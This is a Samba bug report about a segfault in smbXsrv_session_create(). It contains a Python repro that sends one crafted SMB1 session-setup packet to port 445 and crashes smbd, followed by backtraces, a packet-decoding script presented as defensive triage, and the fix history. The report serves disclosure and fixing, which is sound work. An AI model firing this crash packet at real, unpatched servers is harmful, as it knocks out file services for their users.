Bug 10766 - segfault in smbXsrv_session_create()
Summary: segfault in smbXsrv_session_create()
Status: RESOLVED FIXED
Alias: None
Product: Samba 4.1 and newer
Classification: Unclassified
Component: File services
Version: 4.1.11
Hardware: All All
Importance: P5 normal
Target Milestone: ---
Assignee: Jeremy Allison
QA Contact: Samba QA Contact
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2014-08-08 16:24 UTC by dean
Modified: 2017-01-03 08:09 UTC (History)
CC List: 1 user

See Also:


Attachments
git-am fix for 4.1.next and 4.0.next. (1.41 KB, patch)
2014-09-09 18:11 UTC, Jeremy Allison
jra: review? (metze)

Description dean 2014-08-08 16:24:06 UTC
repro:

#!/usr/bin/env python
# Reporter's repro: sends a single raw SMB1 SESSION_SETUP_ANDX request
# (command byte 0x73) to port 445 on the host named on the command line
# and prints whatever the server sends back.
import binascii
import socket
import sys

# NetBIOS session header (4 bytes) followed by the SMB1 message, as hex.
data = '00000058ff534d4273000000001843c8000000000000000000000000ffff814d000004000dff000000ffff0200814d00000000000000000000000054c000001b00000000000055006e00690078000000530061006d00620061000000'

def sendpacket(dataz):
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s1.connect((sys.argv[1], 445))
    # hex string -> raw bytes; works on both Python 2 and Python 3
    raw_data = binascii.unhexlify(dataz)
    s1.send(raw_data)
    print(s1.recv(1024))

print("sending test....")
sendpacket(data)


stack trace from smbd:

INTERNAL ERROR: Signal 11 in pid 25399 (4.1.11)
Please read the Trouble-Shooting section of the Samba HOWTO
===============================================================
PANIC (pid 25399): internal error
BACKTRACE: 25 stack frames:
 #0 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(log_stack_trace+0x2b) [0xb7087301]
 #1 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(smb_panic_s3+0x82) [0xb708715d]
 #2 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsamba-util.so.0(smb_panic+0x2a) [0xb76c0425]
 #3 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsamba-util.so.0(+0x1a0e7) [0xb76c00e7]
 #4 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsamba-util.so.0(+0x1a0f8) [0xb76c00f8]
 #5 [0xb770e400]
 #6 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(smbXsrv_session_create+0x52) [0xb74a9c6d]
 #7 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(reply_sesssetup_and_X+0x14b5) [0xb740f211]
 #8 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13cdda) [0xb7462dda]
 #9 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13cf65) [0xb7462f65]
 #10 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13df1d) [0xb7463f1d]
 #11 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13f0ee) [0xb74650ee]
 #12 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13f1d4) [0xb74651d4]
 #13 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(run_events_poll+0x49f) [0xb70a4bd8]
 #14 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(+0x3cea0) [0xb70a4ea0]
 #15 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0(_tevent_loop_once+0xf3) [0xb7319683]
 #16 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(smbd_process+0x1421) [0xb7468897]
 #17 ./smbd(+0x9004) [0xb7736004]
 #18 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(run_events_poll+0x49f) [0xb70a4bd8]
 #19 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(+0x3cea0) [0xb70a4ea0]
 #20 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0(_tevent_loop_once+0xf3) [0xb7319683]
 #21 ./smbd(+0x9fb1) [0xb7736fb1]
 #22 ./smbd(main+0x1829) [0xb773893f]
 #23 /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6) [0xb69ace66]
 #24 ./smbd(+0x4801) [0xb7731801]


gdb:

Program received signal SIGSEGV, Segmentation fault.
0xb7d7cc6d in smbXsrv_session_create () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so

(gdb) bt
#0  0xb7d7cc6d in smbXsrv_session_create () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#1  0xb7ce2211 in reply_sesssetup_and_X () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#2  0xb7d35dda in switch_message () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#3  0xb7d35f65 in construct_reply () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#4  0xb7d36f1d in process_smb () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#5  0xb7d380ee in smbd_server_connection_read_handler () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#6  0xb7d381d4 in smbd_server_connection_handler () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#7  0xb7977bd8 in run_events_poll () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#8  0xb7977ea0 in s3_event_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#9  0xb7bec683 in _tevent_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0
#10 0xb7d3b897 in smbd_process () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#11 0x80009004 in smbd_accept_connection ()
#12 0xb7977bd8 in run_events_poll () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#13 0xb7977ea0 in s3_event_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#14 0xb7bec683 in _tevent_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0
#15 0x80009fb1 in smbd_parent_loop ()
#16 0x8000b93f in main ()
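Before reading the backtrace it helps to know exactly what the repro puts on the wire. The decoder below is an added example, not part of the bug report or of Samba; it takes the hex string from the repro above, strips the NetBIOS session header and parses the SMB1 header plus the 13-word (non-extended) SESSION_SETUP_ANDX request and its data block, using the field names and layout from MS-CIFS. Field names in the returned dictionary are this example's own choice.

```python
import struct

# Hex string from the repro in the bug description, split only for readability.
REPRO_HEX = (
    "00000058ff534d4273000000001843c8"
    "000000000000000000000000"
    "ffff814d00000400"
    "0dff000000ffff0200814d"
    "000000000000000000000000"
    "54c000001b00"
    "000000000055006e00690078000000530061006d00620061000000"
)

SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000            # SMB_FLAGS2_UNICODE
FLAGS2_EXTENDED_SECURITY = 0x0800  # SMB_FLAGS2_EXTENDED_SECURITY


def _utf16z(buf, off):
    """Read a NUL-terminated UTF-16LE string at off; return (text, offset after terminator)."""
    end = off
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le"), end + 2


def parse_session_setup(frame):
    """Decode a NetBIOS-framed SMB1 SESSION_SETUP_ANDX request (13-word form)."""
    # NetBIOS session service header: 1 byte type, 3 byte big-endian length.
    nb_type, nb_len = frame[0], int.from_bytes(frame[1:4], "big")
    smb = frame[4:4 + nb_len]
    if nb_type != 0 or len(smb) != nb_len or smb[:4] != b"\xffSMB":
        raise ValueError("not a NetBIOS session message carrying SMB1")

    # 32-byte SMB1 header, all fields little-endian (8-byte signature, 2 reserved).
    (command, status, flags, flags2, pid_high, _sig, tid, pid_low, uid, mid) = \
        struct.unpack_from("<BIBHH8s2xHHHH", smb, 4)
    if command != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("command 0x%02x is not SESSION_SETUP_ANDX" % command)

    # Parameter block: WordCount, then WordCount 16-bit words.
    word_count = smb[32]
    if word_count != 13:
        raise ValueError("expected the 13-word request, got %d words" % word_count)
    (andx_cmd, _andx_res, andx_off, max_buf, max_mpx, vc_number, session_key,
     oem_pw_len, uni_pw_len, _res, capabilities) = struct.unpack_from("<BBHHHHIHHII", smb, 33)

    # Data block: ByteCount, then ByteCount bytes. Bounds-check before slicing.
    byte_count = struct.unpack_from("<H", smb, 33 + 2 * word_count)[0]
    data_off = 35 + 2 * word_count
    data = smb[data_off:data_off + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the end of the message")

    # Passwords come first, then AccountName, PrimaryDomain, NativeOS, NativeLanMan.
    off = oem_pw_len + uni_pw_len
    if flags2 & FLAGS2_UNICODE:
        # Unicode strings are 2-byte aligned relative to the start of the SMB header.
        if (data_off + off) % 2:
            off += 1
        account, off = _utf16z(data, off)
        domain, off = _utf16z(data, off)
        native_os, off = _utf16z(data, off)
        native_lanman, off = _utf16z(data, off)
    else:
        parts = data[off:].split(b"\x00")
        account, domain, native_os, native_lanman = \
            [p.decode("latin-1") for p in (parts + [b""] * 4)[:4]]

    return {
        "nb_length": nb_len, "command": command, "status": status,
        "flags": flags, "flags2": flags2,
        "unicode": bool(flags2 & FLAGS2_UNICODE),
        "extended_security_flag": bool(flags2 & FLAGS2_EXTENDED_SECURITY),
        "tid": tid, "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid,
        "word_count": word_count, "andx_command": andx_cmd, "andx_offset": andx_off,
        "max_buffer_size": max_buf, "max_mpx_count": max_mpx, "vc_number": vc_number,
        "session_key": session_key, "oem_password_len": oem_pw_len,
        "unicode_password_len": uni_pw_len, "capabilities": capabilities,
        "byte_count": byte_count, "account": account, "domain": domain,
        "native_os": native_os, "native_lanman": native_lanman,
    }


def describe_repro():
    """Decode the packet from the bug report's repro script."""
    return parse_session_setup(bytes.fromhex(REPRO_HEX))


if __name__ == "__main__":
    for key, value in describe_repro().items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print("%-22s %s" % (key, shown))
```

Run stand-alone it prints every decoded field; the parts a triager cares about are that the request is the 13-word (non-extended) session setup with FLAGS2_EXTENDED_SECURITY nevertheless set in the header, empty OEM and Unicode passwords, an empty account and domain, a UID of 0 and a non-zero VcNumber. Those are the inputs reply_sesssetup_and_X() hands to the session-creation path that the backtrace shows crashing, which is what a defender needs when matching this report against captured traffic or writing a regression test.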
Comment 1 Jeremy Allison 2014-09-09 18:11:10 UTC
Created attachment 10274
git-am fix for 4.1.next and 4.0.next.

Patch that went into master. Applies cleanly to 4.1.next, 4.0.next.
Comment 2 Andrew Bartlett 2017-01-03 08:09:29 UTC
Fixed in Samba 4.3 with dec0243c8595359df6448caf5d242b3d2062deb6

Samba 4.2 and earlier are no longer in support, so marking as fixed.